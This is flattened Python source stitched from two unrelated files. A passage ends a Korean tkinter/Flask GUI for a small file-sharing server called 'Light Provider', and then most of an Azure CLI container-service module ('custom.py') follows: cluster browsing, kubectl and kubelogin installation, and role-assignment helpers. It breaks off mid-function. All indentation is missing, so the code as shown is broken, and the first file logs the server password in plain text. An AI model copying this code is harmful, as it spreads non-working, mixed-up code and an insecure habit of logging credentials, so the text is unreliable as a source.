local_ip.set(socket.gethostbyname(socket.gethostname()))
public_ip.set(get_public_ip())
def update_server_port():
global CONF_SERVER_PORT
CONF_SERVER_PORT = int(server_port.get())
app.logger.info(CONF_SERVER_PORT)
def update_password():
global CONF_PASSWORD
CONF_PASSWORD = password_var.get()
app.logger.info(CONF_PASSWORD)
def update_root_path():
global CONF_ROOT_PATH
if server_run == True:
tk.messagebox.showinfo("알림", "서버 가동중에 경로를 변경할 수 없습니다.")
return
folder_selected = filedialog.askdirectory()
CONF_ROOT_PATH = folder_selected
root_path_var.set(CONF_ROOT_PATH)
app.logger.info(CONF_ROOT_PATH)
def resource_path(relative_path):
try:
base_path = sys._MEIPASS
except Exception:
base_path = os.path.abspath(".")
return os.path.join(base_path, relative_path)
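# Note: sys._MEIPASS is the temporary extraction directory set by PyInstaller when the script is
# bundled as a frozen executable; outside a bundle the current working directory is used instead.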
# Set up UI widgets for Windows or macOS
if IS_OS_WINDOWS or IS_OS_MACOSX:
window = tk.Tk()
server_state_label = tk.Label(
window, text="서버: 중지됨", width=15, anchor="w", padx=10, pady=5)
server_on_off_button = tk.Button(
window, text=" 가동 ", command=on_click_server_state, width=20, foreground="black")
change_root_path_button = tk.Button(
window, text=" 변경 ", command=update_root_path, width=20)
public_ip = tk.StringVar()
local_ip = tk.StringVar()
server_port = tk.StringVar()
server_port.set(CONF_SERVER_PORT)
password_var = tk.StringVar()
password_var.set(CONF_PASSWORD)
root_path_var = tk.StringVar()
root_path_var.set(CONF_ROOT_PATH)
local_ip_textbox = tk.Entry(
window, width=20, textvariable=local_ip, state='readonly')
public_ip_textbox = tk.Entry(
window, width=20, textvariable=public_ip, state='readonly')
server_port_textbox = tk.Entry(
window, width=20, textvariable=server_port)
password_textbox = tk.Entry(
window, width=20, textvariable=password_var)
root_path_textbox = tk.Entry(
window, width=20, textvariable=root_path_var, state='readonly')
def application_userinterface():
global window
global server_state_label
global server_on_off_button
global public_ip
if IS_OS_WINDOWS:
window.geometry("300x200")
else:
window.geometry("350x250")
window.title("Light Provider")
window.resizable(False, False)
if IS_OS_WINDOWS:
window.iconbitmap(default=resource_path('icon.ico'))
reuse_label = tk.Label(window, text=" ", width=15, anchor="w")
reuse_label.grid(row=0, column=0)
server_state_label.grid(row=1, column=0)
server_on_off_button.grid(row=1, column=1)
reuse_label = tk.Label(window, text="Local IP", width=15, anchor="w")
reuse_label.grid(row=2, column=0)
local_ip_textbox.grid(row=2, column=1)
reuse_label = tk.Label(window, text="Remote IP", width=15, anchor="w")
reuse_label.grid(row=3, column=0)
public_ip_textbox.grid(row=3, column=1)
reuse_label = tk.Label(window, text="서버 Port", width=15, anchor="w")
reuse_label.grid(row=4, column=0)
server_port_textbox.grid(row=4, column=1)
reuse_label = tk.Label(window, text="비밀번호", width=15, anchor="w")
reuse_label.grid(row=5, column=0)
password_textbox.grid(row=5, column=1)
reuse_label = tk.Label(window, text="공유 폴더", width=15, anchor="w")
reuse_label.grid(row=6, column=0)
root_path_textbox.grid(row=6, column=1)
reuse_label = tk.Label(window, text="폴더 변경", width=15, anchor="w")
reuse_label.grid(row=7, column=0)
change_root_path_button.grid(row=7, column=1)
update_server_ip()
window.mainloop()
# Application entry point
if __name__ == '__main__':
if IS_OS_WINDOWS or IS_OS_MACOSX:
application_userinterface()
elif IS_OS_LINUX:
app.run(host=CONF_HOST, port=CONF_SERVER_PORT)
else:
print("운영체제를 알 수 없습니다.")
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import binascii
import datetime
import errno
import json
import os
import os.path
import platform
import random
import re
import shutil
import ssl
import stat
import string
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import webbrowser
from distutils.version import StrictVersion
from math import isnan
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
# pylint: disable=import-error
import yaml
import dateutil.parser
from dateutil.relativedelta import relativedelta
from knack.log import get_logger
from knack.util import CLIError
from knack.prompting import prompt_pass, NoTTYException, prompt_y_n
from msrestazure.azure_exceptions import CloudError
import requests
# pylint: disable=no-name-in-module,import-error
from azure.cli.command_modules.acs import acs_client, proxy
from azure.cli.command_modules.acs._params import regions_in_preview, regions_in_prod
from azure.cli.core.api import get_config_dir
from azure.cli.core.azclierror import (ResourceNotFoundError,
ArgumentUsageError,
ClientRequestError,
InvalidArgumentValueError,
ValidationError)
from azure.cli.core._profile import Profile
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac.models import (ApplicationCreateParameters,
ApplicationUpdateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters,
ResourceAccess, RequiredResourceAccess)
from azure.mgmt.containerservice.models import ContainerServiceOrchestratorTypes
from azure.mgmt.containerservice.v2020_09_01.models import ContainerServiceNetworkProfile
from azure.mgmt.containerservice.v2020_09_01.models import ContainerServiceLinuxProfile
from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterServicePrincipalProfile
from azure.mgmt.containerservice.v2020_09_01.models import ContainerServiceSshConfiguration
from azure.mgmt.containerservice.v2020_09_01.models import ContainerServiceSshPublicKey
from azure.mgmt.containerservice.v2020_09_01.models import ManagedCluster
from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterAADProfile
from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterAddonProfile
from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterAgentPoolProfile
from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterIdentity
from azure.mgmt.containerservice.v2020_09_01.models import AgentPool
from azure.mgmt.containerservice.v2020_09_01.models import AgentPoolUpgradeSettings
from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterSKU
from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterWindowsProfile
from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterIdentityUserAssignedIdentitiesValue
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterAgentPoolProfile
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftAgentPoolProfileRole
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterIdentityProvider
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterAADIdentityProvider
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedCluster
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftRouterProfile
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterAuthProfile
from azure.mgmt.containerservice.v2019_09_30_preview.models import NetworkProfile
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterMonitorProfile
from ._client_factory import cf_container_services
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
from ._client_factory import cf_managed_clusters
from ._client_factory import get_msi_client
from ._helpers import (_populate_api_server_access_profile, _set_vm_set_type, _set_outbound_type,
_parse_comma_separated_list)
from ._loadbalancer import (set_load_balancer_sku, is_load_balancer_profile_provided,
update_load_balancer_profile, create_load_balancer_profile)
from ._consts import CONST_SCALE_SET_PRIORITY_REGULAR, CONST_SCALE_SET_PRIORITY_SPOT, CONST_SPOT_EVICTION_POLICY_DELETE
from ._consts import CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME
from ._consts import CONST_MONITORING_ADDON_NAME
from ._consts import CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
from ._consts import CONST_VIRTUAL_NODE_ADDON_NAME
from ._consts import CONST_VIRTUAL_NODE_SUBNET_NAME
from ._consts import CONST_KUBE_DASHBOARD_ADDON_NAME
from ._consts import CONST_AZURE_POLICY_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID, CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME
from ._consts import CONST_INGRESS_APPGW_SUBNET_CIDR, CONST_INGRESS_APPGW_SUBNET_ID
from ._consts import CONST_INGRESS_APPGW_WATCH_NAMESPACE
from ._consts import CONST_CONFCOM_ADDON_NAME, CONST_ACC_SGX_QUOTE_HELPER_ENABLED
from ._consts import ADDONS
from ._consts import CONST_CANIPULL_IMAGE
logger = get_logger(__name__)
# pylint:disable=too-many-lines,unused-argument
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
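# Usage sketch (hypothetical path): which('kubectl') returns e.g. '/usr/local/bin/kubectl',
# or None when the binary is not found anywhere on PATH.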
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
break
except URLError:
time.sleep(1)
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
t = threading.Thread(target=wait_then_open, args=(url,))
t.daemon = True
t.start()
def acs_browse(cmd, client, resource_group_name, name, disable_browser=False, ssh_key_file=None):
"""
Opens a browser to the web interface for the cluster orchestrator
:param name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
:param disable_browser: If true, don't launch a web browser after establishing the proxy
:type disable_browser: bool
:param ssh_key_file: If set a path to an SSH key to use, only applies to DCOS
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file)
def _acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file):
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
if str(orchestrator_type).lower() == 'kubernetes' or \
orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes or \
(acs_info.custom_profile and acs_info.custom_profile.orchestrator == 'kubernetes'): # pylint: disable=no-member
return k8s_browse(cmd, client, name, resource_group_name, disable_browser, ssh_key_file=ssh_key_file)
if str(orchestrator_type).lower() == 'dcos' or orchestrator_type == ContainerServiceOrchestratorTypes.dcos:
return _dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
raise CLIError('Unsupported orchestrator type {} for browse'.format(orchestrator_type))
def k8s_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Launch a proxy and browse the Kubernetes web UI.
:param disable_browser: If true, don't launch a web browser after establishing the proxy
:type disable_browser: bool
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file)
def _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
browse_path = os.path.join(get_config_dir(), 'acsBrowseConfig.yaml')
if os.path.exists(browse_path):
os.remove(browse_path)
_k8s_get_credentials_internal(name, acs_info, browse_path, ssh_key_file, False)
logger.warning('Proxy running on 127.0.0.1:8001/ui')
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1:8001/ui')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy"])
def dcos_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Creates an SSH tunnel to the Azure container service, and opens the Mesosphere DC/OS dashboard in the browser.
:param name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
:param disable_browser: If true, don't launch a web browser after establishing the proxy
:type disable_browser: bool
:param ssh_key_file: Path to the SSH key to use
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
def _dcos_browse_internal(acs_info, disable_browser, ssh_key_file):
if not os.path.isfile(ssh_key_file):
raise CLIError('Private key file {} does not exist'.format(ssh_key_file))
acs = acs_client.ACSClient()
if not acs.connect(_get_host_name(acs_info), _get_username(acs_info),
key_filename=ssh_key_file):
raise CLIError('Error connecting to ACS: {}'.format(_get_host_name(acs_info)))
octarine_bin = '/opt/mesosphere/bin/octarine'
if not acs.file_exists(octarine_bin):
raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(octarine_bin))
proxy_id = _rand_str(16)
proxy_cmd = '{} {}'.format(octarine_bin, proxy_id)
acs.run(proxy_cmd, background=True)
# Parse the output to get the remote PORT
proxy_client_cmd = '{} --client --port {}'.format(octarine_bin, proxy_id)
stdout, _ = acs.run(proxy_client_cmd)
remote_port = int(stdout.read().decode().strip())
local_port = acs.get_available_local_port()
# Set the proxy
proxy.set_http_proxy('127.0.0.1', local_port)
logger.warning('Proxy running on 127.0.0.1:%s', local_port)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1')
try:
acs.create_tunnel(
remote_host='127.0.0.1',
remote_port=remote_port,
local_port=local_port)
finally:
proxy.disable_http_proxy()
def acs_install_cli(cmd, client, resource_group_name, name, install_location=None, client_version=None):
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
kwargs = {'install_location': install_location}
if client_version:
kwargs['client_version'] = client_version
if orchestrator_type == 'kubernetes':
return k8s_install_cli(**kwargs)
if orchestrator_type == 'dcos':
return dcos_install_cli(**kwargs)
raise CLIError('Unsupported orchestrator type {} for install-cli'.format(orchestrator_type))
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _urlretrieve(url, filename):
req = urlopen(url, context=_ssl_context())
with open(filename, "wb") as f:
f.write(req.read())
def _unzip(src, dest):
logger.debug('Extracting %s to %s.', src, dest)
system = platform.system()
if system in ('Linux', 'Darwin', 'Windows'):
import zipfile
with zipfile.ZipFile(src, 'r') as zipObj:
zipObj.extractall(dest)
else:
raise CLIError('The current system is not supported.')
def dcos_install_cli(cmd, install_location=None, client_version='1.8'):
"""
Downloads the dcos command line from Mesosphere
"""
system = platform.system()
if not install_location:
raise CLIError(
"No install location specified and it could not be determined from the current platform '{}'".format(
system))
base_url = 'https://downloads.dcos.io/binaries/cli/{}/x86-64/dcos-{}/{}'
if system == 'Windows':
file_url = base_url.format('windows', client_version, 'dcos.exe')
elif system == 'Linux':
# TODO Support ARM CPU here
file_url = base_url.format('linux', client_version, 'dcos')
elif system == 'Darwin':
file_url = base_url.format('darwin', client_version, 'dcos')
else:
        raise CLIError('The current system ({}) is not supported.'.format(system))
logger.warning('Downloading client to %s', install_location)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as err:
raise CLIError('Connection error while attempting to download client ({})'.format(err))
def k8s_install_cli(cmd, client_version='latest', install_location=None, base_src_url=None,
kubelogin_version='latest', kubelogin_install_location=None,
kubelogin_base_src_url=None):
k8s_install_kubectl(cmd, client_version, install_location, base_src_url)
k8s_install_kubelogin(cmd, kubelogin_version, kubelogin_install_location, kubelogin_base_src_url)
def k8s_install_kubectl(cmd, client_version='latest', install_location=None, source_url=None):
"""
Install kubectl, a command-line interface for Kubernetes clusters.
"""
if not source_url:
source_url = "https://storage.googleapis.com/kubernetes-release/release"
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurechinacloud':
source_url = 'https://mirror.azure.cn/kubernetes/kubectl'
if client_version == 'latest':
context = _ssl_context()
version = urlopen(source_url + '/stable.txt', context=context).read()
client_version = version.decode('UTF-8').strip()
else:
client_version = "v%s" % client_version
file_url = ''
system = platform.system()
base_url = source_url + '/{}/bin/{}/amd64/{}'
# ensure installation directory exists
install_dir, cli = os.path.dirname(install_location), os.path.basename(install_location)
if not os.path.exists(install_dir):
os.makedirs(install_dir)
if system == 'Windows':
file_url = base_url.format(client_version, 'windows', 'kubectl.exe')
elif system == 'Linux':
# TODO: Support ARM CPU here
file_url = base_url.format(client_version, 'linux', 'kubectl')
elif system == 'Darwin':
file_url = base_url.format(client_version, 'darwin', 'kubectl')
else:
        raise CLIError('The current system ({}) is not supported.'.format(system))
logger.warning('Downloading client to "%s" from "%s"', install_location, file_url)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as ex:
raise CLIError('Connection error while attempting to download client ({})'.format(ex))
    if system == 'Windows':  # be verbose, as the install_location is likely not in Windows' search PATH
env_paths = os.environ['PATH'].split(';')
found = next((x for x in env_paths if x.lower().rstrip('\\') == install_dir.lower()), None)
if not found:
# pylint: disable=logging-format-interpolation
            logger.warning('Please add "{0}" to your search PATH so the `{1}` command can be found. Two options: \n'
' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
'This is good for the current command session.\n'
' 2. Update system PATH environment variable by following '
'"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
'You only need to do it once'.format(install_dir, cli))
else:
logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
install_dir, cli)
def k8s_install_kubelogin(cmd, client_version='latest', install_location=None, source_url=None):
"""
Install kubelogin, a client-go credential (exec) plugin implementing azure authentication.
"""
cloud_name = cmd.cli_ctx.cloud.name
if not source_url:
source_url = 'https://github.com/Azure/kubelogin/releases/download'
if cloud_name.lower() == 'azurechinacloud':
source_url = 'https://mirror.azure.cn/kubernetes/kubelogin'
if client_version == 'latest':
context = _ssl_context()
latest_release_url = 'https://api.github.com/repos/Azure/kubelogin/releases/latest'
if cloud_name.lower() == 'azurechinacloud':
latest_release_url = 'https://mirror.azure.cn/kubernetes/kubelogin/latest'
latest_release = urlopen(latest_release_url, context=context).read()
client_version = json.loads(latest_release)['tag_name'].strip()
else:
client_version = "v%s" % client_version
base_url = source_url + '/{}/kubelogin.zip'
file_url = base_url.format(client_version)
# ensure installation directory exists
install_dir, cli = os.path.dirname(install_location), os.path.basename(install_location)
if not os.path.exists(install_dir):
os.makedirs(install_dir)
system = platform.system()
if system == 'Windows':
sub_dir, binary_name = 'windows_amd64', 'kubelogin.exe'
elif system == 'Linux':
# TODO: Support ARM CPU here
sub_dir, binary_name = 'linux_amd64', 'kubelogin'
elif system == 'Darwin':
sub_dir, binary_name = 'darwin_amd64', 'kubelogin'
else:
        raise CLIError('The current system ({}) is not supported.'.format(system))
with tempfile.TemporaryDirectory() as tmp_dir:
try:
download_path = os.path.join(tmp_dir, 'kubelogin.zip')
logger.warning('Downloading client to "%s" from "%s"', download_path, file_url)
_urlretrieve(file_url, download_path)
except IOError as ex:
raise CLIError('Connection error while attempting to download client ({})'.format(ex))
_unzip(download_path, tmp_dir)
download_path = os.path.join(tmp_dir, 'bin', sub_dir, binary_name)
shutil.move(download_path, install_location)
os.chmod(install_location, os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    if system == 'Windows':  # be verbose, as the install_location is likely not in Windows' search PATH
env_paths = os.environ['PATH'].split(';')
found = next((x for x in env_paths if x.lower().rstrip('\\') == install_dir.lower()), None)
if not found:
# pylint: disable=logging-format-interpolation
            logger.warning('Please add "{0}" to your search PATH so the `{1}` command can be found. Two options: \n'
' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
'This is good for the current command session.\n'
' 2. Update system PATH environment variable by following '
'"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
'You only need to do it once'.format(install_dir, cli))
else:
logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
install_dir, cli)
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
    hook.add(message='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result, aad_session_key = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal', value=0.1 * x, total_val=1.0)
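        # AAD may not have propagated the newly created application yet, so retry with a
        # linearly increasing delay (2s, 4s, ... up to 20s) before giving up.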
try:
create_service_principal(cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False, aad_session_key
hook.add(message='Finished service principal creation', value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal, aad_session_key
def _add_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate', value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate', value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except: # pylint: disable=bare-except
pass
time.sleep(delay + delay * x)
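    # The for/else below falls through to `else` (returning False) only when the loop
    # finished without `break`, i.e. every retry failed.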
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
            raise CLIError('When assignment ids are used, other parameters should not be provided')
for i in ids:
assignments_client.delete_by_id(i)
return
    if not any([ids, assignee, role, resource_group_name, scope, yes]):
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete', value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = _resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = _resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub('[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
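# Illustrative example (hypothetical values, not from the original source):
#   _get_default_dns_prefix('myCluster', 'my-rg', '8ecadfc9-d1a3-4ea4-b844-0d9f87e4d7c8')
#   -> 'myCluster-my-rg-8ecadf'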
def list_acs_locations(cmd, client):
return {
"productionRegions": regions_in_prod,
"previewRegions": regions_in_preview
}
def _generate_windows_profile(windows, admin_username, admin_password):
if windows:
if not admin_password:
raise CLIError('--admin-password is required.')
if len(admin_password) < 6:
raise CLIError('--admin-password must be at least 6 characters')
windows_profile = {
"adminUsername": admin_username,
"adminPassword": admin_password,
}
return windows_profile
return None
def _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile):
master_pool_profile = {}
default_master_pool_profile = {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
}
if api_version == "2017-07-01":
default_master_pool_profile = _update_dict(default_master_pool_profile, {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
"vmSize": master_vm_size,
"osDiskSizeGB": int(master_osdisk_size),
"vnetSubnetID": master_vnet_subnet_id,
"firstConsecutiveStaticIP": master_first_consecutive_static_ip,
"storageProfile": master_storage_profile,
})
if not master_profile:
master_pool_profile = default_master_pool_profile
else:
master_pool_profile = _update_dict(default_master_pool_profile, master_profile)
return master_pool_profile
def _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile):
agent_pool_profiles = []
default_agent_pool_profile = {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
}
if api_version == "2017-07-01":
default_agent_pool_profile = _update_dict(default_agent_pool_profile, {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osDiskSizeGB": int(agent_osdisk_size),
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
"vnetSubnetID": agent_vnet_subnet_id,
"ports": agent_ports,
"storageProfile": agent_storage_profile,
})
if agent_profiles is None:
agent_pool_profiles.append(_update_dict(default_agent_pool_profile, {"name": "agentpool0"}))
else:
# override agentPoolProfiles by using the passed in agent_profiles
for idx, ap in enumerate(agent_profiles):
# if the user specified dnsPrefix, we honor that
# otherwise, we use the idx to avoid duplicate dns name
a = _update_dict({"dnsPrefix": dns_name_prefix + 'agent' + str(idx)}, ap)
agent_pool_profiles.append(_update_dict(default_agent_pool_profile, a))
return agent_pool_profiles
def _generate_outputs(name, orchestrator_type, admin_username):
# define outputs
outputs = {
"masterFQDN": {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).masterProfile.fqdn]".format(name) # pylint: disable=line-too-long
},
"sshMaster0": {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 22')]".format(admin_username, name) # pylint: disable=line-too-long
},
}
if orchestrator_type.lower() != "kubernetes":
outputs["agentFQDN"] = {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).agentPoolProfiles[0].fqdn]".format(name) # pylint: disable=line-too-long
}
# override sshMaster0 for non-kubernetes scenarios
outputs["sshMaster0"] = {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 2200')]".format(admin_username, name) # pylint: disable=line-too-long
}
return outputs
def _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile):
properties = {
"orchestratorProfile": {
"orchestratorType": orchestrator_type,
},
"masterProfile": master_pool_profile,
"agentPoolProfiles": agent_pool_profiles,
"linuxProfile": {
"ssh": {
"publicKeys": [
{
"keyData": ssh_key_value
}
]
},
"adminUsername": admin_username
},
}
if api_version == "2017-07-01":
properties["orchestratorProfile"]["orchestratorVersion"] = orchestrator_version
if windows_profile is not None:
properties["windowsProfile"] = windows_profile
return properties
def _get_user_assigned_identity_client_id(cli_ctx, resource_id):
msi_client = get_msi_client(cli_ctx)
pattern = '/subscriptions/.*?/resourcegroups/(.*?)/providers/microsoft.managedidentity/userassignedidentities/(.*)'
resource_id = resource_id.lower()
match = re.search(pattern, resource_id)
if match:
resource_group_name = match.group(1)
identity_name = match.group(2)
try:
